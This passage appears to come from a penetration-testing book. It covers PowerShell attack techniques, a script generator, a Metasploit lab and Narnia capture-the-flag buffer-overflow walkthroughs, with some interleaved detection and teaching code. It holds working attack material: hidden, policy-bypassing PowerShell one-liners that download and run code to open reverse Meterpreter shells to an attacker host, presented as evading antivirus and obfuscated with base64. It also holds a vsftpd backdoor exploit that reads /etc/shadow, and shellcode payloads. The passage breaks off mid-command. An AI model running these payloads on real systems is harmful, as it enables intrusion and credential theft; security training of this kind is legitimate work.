• Download and install Metasploit http://www.metasploit.com/
• Download and install either Nessus or Nexpose
    o If you are buying your own software, you should probably look into Nessus as it is much cheaper, but both work well
• Download and install nmap http://nmap.org/download.html
• Download and install oclHashcat http://hashcat.net/oclhashcat/
• Download and install Cain and Abel http://www.oxid.it/cain.html
• Download Burp Proxy Pro http://portswigger.net/burp/download.html
• Download and extract Nishang: https://github.com/samratashok/nishang
• Download and extract PowerSploit: https://github.com/mattifestation/PowerSploit/
• Installing Firefox Add-ons
    o Web Developer Add-on: https://addons.mozilla.org/en-US/firefox/addon/web-developer/
    o Tamper Data: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
    o Foxy Proxy: https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
    o User Agent Switcher: https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/


Power Up With PowerShell


PowerShell has really changed the game on penetration testing. If you don't have any experience with PowerShell, I would highly recommend you take some time and write some basic PowerShell scripts. If you need something to help get you in the PowerShell game, take a look at this video:

• Intro to PowerShell Scripting for Security: http://bit.ly/1MCb7EJ

The video is kind of long, but will get you some of the basics you need to get your PowerShelling off the ground.


Why do I focus so much on PowerShell in this book? The benefits of PowerShell for a penetration tester:

• Installed by default on Windows 7+ machines
• PowerShell scripts can run in memory
• Almost never triggers antivirus
• Utilizes .NET Framework classes
• Takes advantage of credentials of the user (for querying Active Directory)
• Can be used to manage Active Directory
• Remotely executes PowerShell scripts
• Makes scripting Windows attacks much easier
• Many tools are now being built in PowerShell and understanding it will make you a more powerful and efficient penetration tester


You can always drop into a PowerShell command from a Windows terminal prompt by typing "powershell" and get to the help menu by typing "help" once inside PowerShell. Here are the basic flags and settings used throughout the book:


• -Exec Bypass: Bypass Security Execution Protection
    o This one is extremely important! By default, PowerShell has an execution policy to not run PowerShell commands/files. By running this command you bypass any of those settings. Throughout the book we will use this flag almost every time.
• -NonI: Noninteractive Mode - PowerShell does not present an interactive prompt to the user
• -NoProfile (or -NoP): Enforces PowerShell console not to load the current user's profile
• -NoExit: Do not exit shell after execution. This is important for scripts like keyloggers, so that they continually run.
• -W Hidden: Sets the window style for the session. This is so that the command prompt stays hidden.
• 32-bit or 64-bit PowerShell:
    o This is also very important. Some scripts are only meant to run on their specified platform. So if you are on a 64-bit box, you might need to execute 64-bit PowerShell to run the command.
    o 32-bit PowerShell Execution: powershell.exe -NoP -NonI -W Hidden -Exec Bypass
    o 64-bit PowerShell Execution: %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass


To help you better understand what we will come across in the PowerShell adventures, here are some of the common execution commands that will be used throughout this book:


The first command will download a PowerShell script from a web server and execute that script. In many cases, we are going to download a Meterpreter PowerShell script on a victim target via a command prompt:
• Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('[PowerShell URL]'); [Parameters]


For example, if we want to execute a Meterpreter Shell on a target, we need to download this script:
• https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1


We also need to know which parameters to use. The easiest way to find out what parameters you might need is to read the source code of the PowerShell script. Go visit the Invoke-Shellcode.ps1 file. If we look at the Invoke-Shellcode.ps1 file written by Mattifestation, we can see an example of how to call a reverse-https Meterpreter shell.


[Screenshot: the Invoke-Shellcode.ps1 source on raw.githubusercontent.com, showing the example call "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport [...]" and its description: "Establishes a reverse http meterpreter payload from within the running PowerShell process. A multi-handler ..."]
Invoke-Shellcode.ps1


Our final PowerShell command will look like this:
• Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 80


This makes PowerShell extremely easy and powerful to use. Let’s look at a few more examples. 


Let's say you downloaded the same file onto the target. You don't want to have to reach out to a web page to automatically download and execute the file. To locally run it:


• powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "& {Import-Module [Path and File of PowerShell Script]; [Parameters]}"


Lastly, throughout this book, I will regularly use base64 encoded PowerShell scripts both for obfuscation and for compacting my code. To run an encoded PowerShell Script:


• powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc [Base64 Code]


Hopefully, this makes using PowerShell pretty straightforward and usable in your own tests. 
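What the flag combinations above look like from the defender's side, as an added example that is not from the book: a scorer for process-creation command lines (Sysmon Event ID 1, Security 4688) that recognises the -NoP -NonI -W Hidden -Exec Bypass download cradle and decodes -enc arguments, which PowerShell expects as base64 over UTF-16LE. The sample command lines, the file paths and the host 10.0.0.5 are constructed for this example.

```python
"""Score PowerShell process command lines for the flag combinations above.

Added example, not from the book: the kind of check a defender runs over
process-creation events (Sysmon Event ID 1, Security 4688). Sample command
lines and the host 10.0.0.5 are constructed for this example.
"""
import base64
import re
from typing import Dict, List, Optional

# Each indicator carries a weight; -NoProfile alone is routine administration,
# the full -NoP -NonI -W Hidden -Exec Bypass cradle is not.
INDICATORS = {
    "exec_bypass": (re.compile(r"-(?:exec|ep|executionpolicy)\s+bypass", re.I), 3),
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    "non_interactive": (re.compile(r"-noni(?:nteractive)?\b", re.I), 1),
    "no_profile": (re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    "download_cradle": (
        re.compile(r"iex\s*\(?\s*new-object\s+net\.webclient\)?\.downloadstring", re.I), 4),
    "encoded_command": (
        re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I), 3),
}
ALERT_THRESHOLD = 5


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode a -EncodedCommand argument: PowerShell expects base64 of UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command; used here only to build the sample line."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze_command_line(cmdline: str) -> Dict[str, object]:
    """Return matched indicators, a score, any decoded -enc payload and a verdict."""
    hits: List[str] = []
    score = 0
    decoded: Optional[str] = None
    for name, (pattern, weight) in INDICATORS.items():
        match = pattern.search(cmdline)
        if not match:
            continue
        hits.append(name)
        score += weight
        if name == "encoded_command":
            decoded = decode_encoded_command(match.group(1))
            # A cradle hidden inside -enc counts just like a plaintext one.
            cradle, cradle_weight = INDICATORS["download_cradle"]
            if decoded and "download_cradle" not in hits and cradle.search(decoded):
                hits.append("download_cradle")
                score += cradle_weight
    return {"hits": hits, "score": score, "decoded": decoded,
            "suspicious": score >= ALERT_THRESHOLD}


# Constructed sample events: one routine script run, the book's cradle in
# clear text, and the same cradle base64-encoded as Easy-P option 7 emits it.
SAMPLE_CMDLINES = [
    r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    "Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient)"
    ".DownloadString('http://10.0.0.5/Invoke-Shellcode.ps1'); Invoke-Shellcode"
    " -Payload windows/meterpreter/reverse_https -Lhost 10.0.0.5 -Lport 443",
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc "
    + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')"),
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = analyze_command_line(line)
        print(result["suspicious"], result["score"], result["hits"])
        if result["decoded"]:
            print("  decoded:", result["decoded"])
```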


Easy-P 


Because this book is so heavily invested in PowerShell attacks, I created a little script to make 
PowerShell a little more accessible during a penetration test. Easy-P has some of the common 
PowerShell tools I use and the ability to encode my scripts. 


For every command, Easy-P will give you multiple ways to run the code both locally and remotely. Note that all the remote PowerShell scripts are linked to either my code or to forked versions of other people's code. I want to mention something here, which will be mentioned a couple more times throughout the book: Remember to fork your own copies off of the original sources, so that you don't blindly run someone else's code. You never know if someone is going to maliciously change the PowerShell script randomly and now, either nothing works or even worse, your shells are going somewhere else. Let's dive into Easy-P to make your life much simpler.


• cd /opt/Easy-P
• python ./easy-p.py


/opt/Easy-P# python ./easy-p.py

PowerShell/WMI Generator

--Easy-P Menu System--
1. Privilege Escalation
2. Lateral Movement
3. Keylogging
4. PowerShell Meterpreter
5. Change Users Execution Policy
6. PowerShell 101
7. Base64 Encode a PowerShell Script
8. Exit/Quit

What would you like to do:

THP Easy-P


One of the most common things I will do in this book is use PowerShell Meterpreter Scripts. Once 
you execute the Easy-P script, select option 4. You will be presented with setting your localhost IP 
and the port on which you want the Meterpreter script to connect back. Once that is done, you will 
have an output similar to the following: 





What would you like to do: 4

[*] PowerShell Metasploit Meterpreter Reverse HTTPS Shell
LHOST: 192.168.1.100
LPORT: 4444

[*] Download from internet and execute:
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.100 -Lport 4444 -Force

[*] Run from a local copy of the script:
powershell.exe -exec bypass -Command "& {Import-Module .\Invoke-Shellcode.ps1; Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.100 -Lport 4444 -Force}"

[*] Base64 encoded version download and execute:
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc [Base64 Code]


[*] Listener Resource Script (listener.rc) - Save the following to a file called listener.rc and load your handler with msfconsole -r listener.rc
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 4444

Example Easy-P Output


You will get four different outputs:
• Download from the Internet and execute: Download a PowerShell script from a website, then execute that script. This is great when you only have a simple shell and do not have the ability to download files.
• Run from a local copy of the script: If you have already pushed a PowerShell file to the system, it will output a command to import that PowerShell script and execute it.
• Base64 encoded version of download and execute: If for some reason you want to obfuscate your scripts or you run into character limitations, this will base64-encode your code and give you the execution command.
• Resource File: Lastly, you will be given the associated Resource File. A Metasploit resource file is a quick way to automatically set up a handler for the Meterpreter PowerShell script. Copy that resource script and save it to a file: /opt/listener.rc.





All of the scripts are already configured to bypass execution policy, stay hidden, and run non- 
interactive. Take a look at all of the other menu choices in Easy-P, as it also has modules on Privilege 
Escalation, Lateral Movement, Keylogging, PowerShell Meterpreter, and Change Users Execution 
Policy. Feel free to fork my code and modify it to add all the PowerShell code you need. 


Learning 


This book is really geared toward those who have, at a minimum, some understanding of tools like 
Nmap, Metasploit, Cain and Abel, aircrack and others. You should also have a high level of 
understanding of attacks like buffer overflows and high-level languages like Python/Ruby. 


If you need a quick refresher or need to do some testing, here is a little starter pack for you: 


Metasploitable 2 


One comment I received was that there were no beginner walk-throughs on how to use Metasploit or fully test exploits using some of Metasploit's features. This is where Metasploitable 2 comes in as a great test bed. Before we get started, we need to download the VMware image for Metasploitable 2.


Download:
http://sourceforge.net/projects/metasploitable/files/Metasploitable2/


Once you download Metasploitable 2, unzip it, and open it in VMware Player or VirtualBox, log in with the user account msfadmin and password msfadmin. Now, you have your vulnerable VM image running.


LAB 

Practice running Nmap, Masscan, or vulnerability tools against the vulnerable virtual machine. Once you find the system vulnerable to an exploit, let's get a shell on it. In our example, we found and are going to take advantage of a flaw in vsftpd. So we can either do a search for the exploit (search vsftpd) or we can go straight into the exploit.


• msfconsole
• use exploit/unix/ftp/vsftpd_234_backdoor (selects the exploit)
• show options (shows all the configuration options)
• set RHOST [IP] (sets the Metasploitable 2 IP)
• exploit (runs the exploit)


msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):
   Name   Current Setting  Required  Description
   RHOST                            The target address
   RPORT                            The target port

Exploit target:
   Id  Name
   0   Automatic

msf exploit(vsftpd_234_backdoor) > set RHOST 172.16.151.145
RHOST => 172.16.151.145
msf exploit(vsftpd_234_backdoor) > exploit

Banner: 220 (vsFTPd 2.3.4)
USER: 331 Please specify the password.
Backdoor service has been spawned, handling...
UID: uid=0(root) gid=0(root)
Found shell.
Command shell session 2 opened ... 2015-02-22 00:00:3[...]

cat /etc/shadow
[output of cat /etc/shadow: the root, daemon, bin and sys entries; hashes omitted]
Metasploit Example





We were successfully able to exploit this vulnerability and read the stored passwords with: cat /etc/shadow. To further dig into Metasploitable 2, check out the Rapid7 guide:


There are a ton of different vulnerabilities on this virtual machine. Make sure you spend time learning 
how to effectively use Metasploit and Meterpreter. If you are looking to get deeper into Metasploit, I 
recommend: 


Binary Exploitation 


Just like in the first edition of The Hacker Playbook, this book does not go deeply into binary exploitation, because this is a whole other topic that requires something like The Shellcoder's Handbook ( ) or Hacking: The Art of Exploitation, 2nd Edition ( ). However, this doesn't mean that you shouldn't have an understanding of buffer overflows and basic exploitation. Since all penetration testers should be able to "script" code, they should also be able to read other exploitation code. You might find a module in Metasploit that does not work and needs minor modifications, or you might need to verify what an exploit does before you download it from the Internet.


There are a ton of different sites you can start with to get the basics down on binary exploitation. A great place to learn is a site called Over the Wire (http://overthewire.org/wargames/narnia/). Over the Wire is an online CTF-style challenge that focuses on all aspects of hacking from binary to web. In this chapter, we are only going to focus on binary exploitation. If you have never done anything like this before, I would take a couple of weekends to hammer away at this site. To get you started, I will walk you through the first couple of challenges; however, it is up to you to continue down the path.


Before you begin, study up a bit on:
• Basic assembly and understanding registers
• The basics on GDB (GNU Debugger)
• Understand the different memory segments (the stack, heap, data, BSS, and code segments)
• Shellcode basics


Some resources that might help you start:

• http://opensecuritytraining.info/IntroX86.html
• http://www.reddit.com/r/hacking/comments/1wy610/exploit_tutorial_buffer_overflo[...]
• https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
• http://www.lethalsecurity.com/wiki
• http://opensecuritytraining.info/Exploits1.html
• https://exploit-exercises.com/protostar/


Narnia Setup
(http://overthewire.org/wargames/narnia/)


Stage 1
Narnia is configured so that you SSH into their servers and all challenges are located under /narnia/. Let's walk through the first three examples. From a terminal prompt on Kali or using something like PuTTY (http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html) on Windows:


• ssh narnia0@narnia.labs.overthewire.org
• Password: narnia0
• cd /narnia/


Each challenge is laid out in a manner that shows you both the C code and the binary executable. For challenge 0, we have both a narnia0 and narnia0.c file. Let's take a look at the raw C code:
• cat narnia0.c


narnia0@melinda:/narnia$ cat narnia0.c
/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <stdio.h>
#include <stdlib.h>

int main(){
    long val=0x41414141;
    char buf[20];

    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
    printf("Here is your chance: ");
    scanf("%24s",&buf);    /* reads up to 24 bytes into a 20-byte buffer */

    printf("buf: %s\n",buf);
    printf("val: 0x%08x\n",val);

    if(val==0xdeadbeef)
        system("/bin/sh");
    else {
        printf("WAY OFF!!!!\n");
        exit(1);
    }

    return 0;
}
Narnia 0 - Code


After taking a quick look at the code, we see the variable "val" is assigned to the hex value of "AAAA". Next, we see that it takes an input with a buffer length of 20 bytes. A few lines later, we see that scanf() accepts 24 bytes maximum. This is your very simple buffer overflow type example. Now, let's run the executable, and, as a test, supply it 20 A's and 4 B's (because we know the hex value of A = 41 and B = 42). So at the command prompt, it should look something like this:


• narnia0@melinda:/narnia$ ./narnia0
• Correct val's value from 0x41414141 -> 0xdeadbeef!
• Here is your chance: AAAAAAAAAAAAAAAAAAAABBBB
• buf: AAAAAAAAAAAAAAAAAAAABBBB
• val: 0x42424242
• WAY OFF!!!!


Great! Since the HEX value at "val" is 0x42424242 (42 translates to the ASCII letter B), we know that we are able to overwrite the value of "val" in memory, which was previously 0x41414141. All we have to do now is overwrite this value in memory with 0xdeadbeef. The thing to remember is that everything must be written to the stack in Little Endian format (http://en.wikipedia.org/wiki/Endianness), meaning the last byte in 0xdeadbeef must be the first byte pushed to the stack to overwrite the value of "val". This is due to the First-In, Last-Out (FILO), or Last-In, First-Out (LIFO) architecture of the target machine's stack. So, to supply our 0xdeadbeef value, we will have to write it as "\xef\xbe\xad\xde". The easiest way to supply only HEX values and execute our A's is using python and piping it into our narnia0 example. Let's see this in action:


• narnia0@melinda:/narnia$ python -c 'print "A"*20 + "\xef\xbe\xad\xde"' | ./narnia0
• Correct val's value from 0x41414141 -> 0xdeadbeef!
• Here is your chance: buf: AAAAAAAAAAAAAAAAAAAA[non-printable bytes]
• val: 0xdeadbeef
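A byte-level model of the narnia0 frame, added here as an example (it is not code from the challenge or the book): it shows why a scanf width of 24 into a 20-byte buf lets the input choose val, why the bytes have to be laid down in little-endian order, and what the width a fixed program would use does instead. It assumes buf sits directly below val with no padding, which is what the run above observes.

```python
"""Byte-level model of the narnia0 stack frame.

Added example, not code from the challenge or the book. It assumes buf[20]
sits directly below val with no padding, which is what the walkthrough
above observes, and ignores scanf's whitespace handling.
"""
import struct

BUF_SIZE = 20           # char buf[20];
VAL_INIT = 0x41414141   # long val = 0x41414141;   ("AAAA")


def run_narnia0(user_input: bytes, scanf_width: int = 24) -> int:
    """Return val after scanf("%<width>s", &buf) copies user_input into the frame.

    The width is the only bound scanf applies; it does not know buf is 20
    bytes, so a width of 24 lets 4 bytes spill into val (and the NUL that
    scanf appends lands one byte beyond that).
    """
    frame = bytearray(b"\x00" * BUF_SIZE + struct.pack("<I", VAL_INIT))
    data = user_input[:scanf_width]
    frame[:len(data)] = data                      # copy, overflowing past buf
    return struct.unpack("<I", frame[BUF_SIZE:BUF_SIZE + 4])[0]


def narnia0_input(target: int) -> bytes:
    """Fill buf, then lay target down as little-endian bytes where val lives."""
    return b"A" * BUF_SIZE + struct.pack("<I", target)


if __name__ == "__main__":
    print(hex(run_narnia0(b"A" * 20 + b"BBBB")))           # 0x42424242
    print(hex(run_narnia0(narnia0_input(0xdeadbeef))))      # 0xdeadbeef
    # The fix: a width that leaves room for the terminator inside buf.
    print(hex(run_narnia0(narnia0_input(0xdeadbeef), scanf_width=BUF_SIZE - 1)))  # 0x41414141
```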














Great x2! We now have written deadbeef in our "val" variable. How can we run shell commands? If we go back to our C code, we see that if we match deadbeef, /bin/sh gets called. So let's take our python code and try to read the key located at /etc/narnia_pass/narnia1:

• narnia0@melinda:/narnia$ (python -c 'print "A"*20 + "\xef\xbe\xad\xde"'; echo 'cat /etc/narnia_pass/narnia1') | /narnia/narnia0
• Correct val's value from 0x41414141 -> 0xdeadbeef!
• Here is your chance: buf: AAAAAAAAAAAAAAAAAAAA[non-printable bytes]
• val: 0xdeadbeef
• [Answer to Stage 1]


[Screenshot of the same command and its output; the last line printed is the narnia1 password.]
Narnia 0 - Exploit


If you were successful, you have defeated stage 1 and earned the password to the narnial account. We 
need to log out and log into the newly gathered account. 


Stage 2
After you finish each stage, you get the password to the next account. Let's log into stage 2 using the narnia1 account we just obtained.


Log into stage 2:
• ssh narnia1@narnia.labs.overthewire.org
• Password: [Password From Narnia 1]
• cd /narnia/
• cat narnia1.c


#include <stdio.h>
#include <stdlib.h>

int main(){
    int (*ret)();

    if(getenv("EGG")==NULL){
        printf("Give me something to execute at the env-variable EGG\n");
        exit(1);
    }

    printf("Trying to execute EGG!\n");
    ret = getenv("EGG");
    ret();
}
Narnia 1 - Code


Reading the C code, we see a couple of things immediately:


• int (*ret)(); - declares ret as a pointer to a function
• getenv - takes in the environment variable EGG and stores it in the variable ret
• Calls ret()


If we can store shellcode in the environment variable EGG, then whatever shellcode is stored there will be executed. The easy way to do this is to take the shellcode for /bin/sh and set it to an environment variable EGG.


• We will use the shellcode for /bin/sh from this example: http://shell-storm.org/shellcode/files/shellcode-811.php


• export EGG=`python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x[...]"'`
• ./narnia1


• cat /etc/narnia_pass/narnia2


[Screenshot: narnia1@melinda:/narnia$ export EGG=`python -c 'print "\x31\xc0..."'`, then ./narnia1 prints "Trying to execute EGG!" and the resulting $ shell runs cat /etc/narnia_pass/narnia2]
Narnia 1 - Exploit


We now have the password to the narnia2 account and can move on to stage 3. 


Stage 3
For stage 3:
• ssh narnia2@narnia.labs.overthewire.org
• Password: [Password from Narnia 2]
• cd /narnia/
• cat narnia2.c
Looking at the C code, we see the following:
• char buf[128];
• if(argc == 1){
• printf("Usage: %s argument", argv[0]);
• exit(1);
• }
• strcpy(buf,argv[1]);
• printf("%s", buf);


By looking at the code, we see that it takes an argument and copies it into buf. We see that there is a char buf of 128 bytes, so let's start by sending 200 characters:

• narnia2@melinda:/narnia$ ./narnia2 `python -c 'print "A" * 200'`
• Segmentation fault


We just verified that sending 200 characters causes the application to have a segmentation fault. We need to identify how many bytes we send before we overwrite EIP. We can do this with a Metasploit module called pattern_create.rb. This module creates a unique string, and in our example below we will create a string of 200 bytes. Since this string never repeats, we can identify exactly where our program overflows EIP.


• /usr/share/metasploit-framework/tools/pattern_create.rb 200
• Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac[...]


Now, let's run our new custom unique string through narnia2 to see how many bytes it takes before we cause a segmentation fault. To see the exact results of our segmentation fault, we will have to use a debugger. By default, Linux systems have a debugger called gdb. Although it isn't the easiest debugger to use, it is extremely powerful:


• gdb ./narnia2 -q
• run `python -c 'print "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9[...]"'`


The result of the query is:


narnia2@melinda:/narnia$ gdb ./narnia2 -q
Reading symbols from ./narnia2...(no debugging symbols found)...done.
(gdb) run `python -c 'print "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3[...]"'`
Starting program: /games/narnia/narnia2 `python -c 'print "Aa0Aa1Aa2Aa3[...]"'`

Program received signal SIGSEGV, Segmentation fault.
0x37654136 in ?? ()
Narnia 2 - Exploit


• Program received signal SIGSEGV, Segmentation fault.
• 0x37654136 in ?? ()


The output from our command is 0x37654136. We need to look in our original string to find that exact value. To find the exact number of bytes where the segmentation fault was caused, we can use Metasploit's pattern_offset.rb:


• /usr/share/metasploit-framework/tools/pattern_offset.rb 0x37654136
• [*] Exact match at offset 140
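The two pattern tools above, reimplemented in Python as an added example (not the book's or Metasploit's code), to show why the crash value maps to exactly one offset: the pattern is every Upper-lower-digit triple in order, so any 4-byte window is unique within its first 20280 bytes, and the value in EIP is those 4 bytes read back in little-endian order. The eip_probe helper is this example's name for the "A" * 140 + "B" * 4 input used next.

```python
"""Cyclic pattern used by pattern_create.rb / pattern_offset.rb, in Python.

Added example, not the book's or Metasploit's code. The pattern is every
Upper-lower-digit triple in order (Aa0 Aa1 ... Aa9 Ab0 ...), so any 4-byte
window identifies one position within the first 20280 bytes.
"""
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits
from typing import Optional

MAX_UNIQUE = 26 * 26 * 10 * 3   # bytes before the triple sequence wraps


def pattern_create(length: int) -> str:
    """Return the first `length` characters of the pattern."""
    if not 0 <= length <= MAX_UNIQUE:
        raise ValueError(f"length must be between 0 and {MAX_UNIQUE}")
    chunks = []
    size = 0
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        if size >= length:
            break
        chunks.append(upper + lower + digit)
        size += 3
    return "".join(chunks)[:length]


def pattern_offset(register_value: int, length: int = MAX_UNIQUE) -> Optional[int]:
    """Map a crashed EIP value back to its offset in the pattern.

    The register holds the overwritten bytes in little-endian order, so
    0x37654136 is the bytes 36 41 65 37, i.e. the text "6Ae7" as it was sent.
    """
    needle = struct.pack("<I", register_value)
    index = pattern_create(length).encode("ascii").find(needle)
    return None if index == -1 else index


def eip_probe(offset: int, marker: bytes = b"BBBB") -> bytes:
    """Filler up to the saved return address, then a marker that should land in EIP."""
    return b"A" * offset + marker


if __name__ == "__main__":
    print(pattern_create(200))
    print(pattern_offset(0x37654136))   # 140
    print(len(eip_probe(140)))          # 144
```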


This shows that after 140 characters, we can control EIP. To verify this, we can run narnia2 with an input of 140 bytes and we should be able to overwrite EIP with an extra 4 bytes. We are going to use a debugger to watch it happen in memory.


The output should look like the following:


• cd /narnia
• gdb ./narnia2 -q
• (gdb) run `python -c 'print "A" * 140 + "B" * 4'`
    o Starting program: /games/narnia/narnia2 `python -c 'print "A" * 140 + "B" * 4'`
    o Program received signal SIGSEGV, Segmentation fault.
    o 0x42424242 in ?? ()
• (gdb) info registers
    o eax 0x0 0
    o ecx 0x0 0
    o edx 0xf7fcb898 -134432616
    o ebx 0xf7fca000 -134438912
    o esp 0xffffd640 0xffffd640
    o ebp 0x41414141 0x41414141
    o esi 0x0 0
    o edi 0x0 0
    o eip 0x42424242 0x42424242


We were able to overwrite EIP with all "B" (or hex equivalent 0x42) characters, which is the pointer to the code that will be executed next by the processor. If we can point EIP to an area of shellcode, we can compromise the system. Where might you find shellcode? You can always generate your own or you can grab shellcode from here: http://shell-storm.org/shellcode/.


In this example, we are going to use Linux/x86 - execve(/bin/sh) - 28 bytes. We know our shellcode is 28 bytes and our payload needs to be 144 bytes in length. I also want to change my A's to NOPs or \x90, which means if we land on a NOP, execution will continue until we hit executable code. After playing around a little with the space, I created the following:
• cd /narnia
• gdb ./narnia2 -q
• run `python -c 'print "\x90" * 50 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x[...]" + "\x90" * 67 + "BBBB"'`
    o Starting program: /games/narnia/narnia2 `python -c 'print "\x90" * 50 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x5[...]" + "\x90" * 67 + "BBBB"'`
    o Program received signal SIGSEGV, Segmentation fault.
    o 0x42424242 in ?? ()
• (gdb) info registers eip
    o eip 0x42424242 0x42424242


We successfully have control of EIP with our shellcode and NOPs. Now, we just need to point EIP anywhere into our NOPs and we should have a /bin/sh shell. To see what is stored in memory after we seg fault, type:

• x/250x $esp


Scrolling through, you should see something like the following:


0xffffd780: 0x00000004 0x00000020 0x00000005 0x00000008
0xffffd790: 0x00000007 0xf7fdc000 0x00000008 0x00000000
0xffffd7a0: 0x00000009 0x08048360 0x0000000b 0x000036b2
0xffffd7b0: 0x0000000c 0x000036b2 0x0000000d 0x000036b2
0xffffd7c0: 0x0000000e 0x000036b2 0x00000017 0x00000000
0xffffd7d0: 0x00000019 0xffffd7fb 0x0000001f 0xffffdfe2
0xffffd7e0: 0xe000000f 0xffffd80b 0x00000000 0x00000000
0xffffd7f0: 0x00000000 0x00000000 0x4a000000 0x4a448600
0xffffd800: 0x1b1f07ce 0x2b6dbf8d 0x698c040a 0x00363836
0xffffd810: 0x672f0000 0x73656d61 0x72616e2f 0x2f61696e
0xffffd820: 0x6e72616e 0x00326169 0x90909090 0x90909090
0xffffd830: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd840: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd850: 0x90909090 0x90909090 0xc0319090 0x2f2f6850
0xffffd860: 0x2f686873 0x896e6962 0x895350e3 0xcd0bb0e1
0xffffd870: 0x90909080 0x90909090 0x90909090 0x90909090
0xffffd880: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd890: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd8a0: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd8b0: 0x90909090 0x42424242 0x47445800 0x5345535f
---Type <return> to continue, or q <return> to quit---
0xffffd8c0: 0x4e4f4953 0x3d44495f 0x36343832 0x48530034
0xffffd8d0: 0x3d4c4c45 0x6e69622f 0x7361622f 0x45540068
0xffffd8e0: 0x783d4d52 0x6d726574 0x3635322d 0x6f6c6f63
0xffffd8f0: 0x53530072 0x4c435f48 0x544e4549 0x2e30373d


NOP Sled


We see our initial NOPs (\x90), followed by our shellcode, more NOPs, and lastly, our BBBB. We
need to change our BBBB to an address in our NOP sled to execute our shellcode. An easy address is
0xffffd850, a stack address which points to our first set of NOPs. Let's give it a try and don't forget
Little Endian.


• (gdb) run `python -c 'print "\x90" * 50 +
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x
+ "\x90" * 67 + "\x50\xd8\xff\xff"'`
◦ Starting program: /games/narnia/narnia2 `python -c 'print "\x90" * 50 +
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x5
+ "\x90" * 67 + "\x50\xd8\xff\xff"'`
◦ process 5823 is executing new program: /bin/dash
• $ cat /etc/narnia_pass/narnia3
◦ cat: /etc/narnia_pass/narnia3: Permission denied


We were able to get our shellcode to execute, but for some reason we couldn't read the narnia3
password. Let's try this outside of GDB:
• narnia2@melinda:/narnia$ ./narnia2 `python -c 'print "\x90" * 50 +
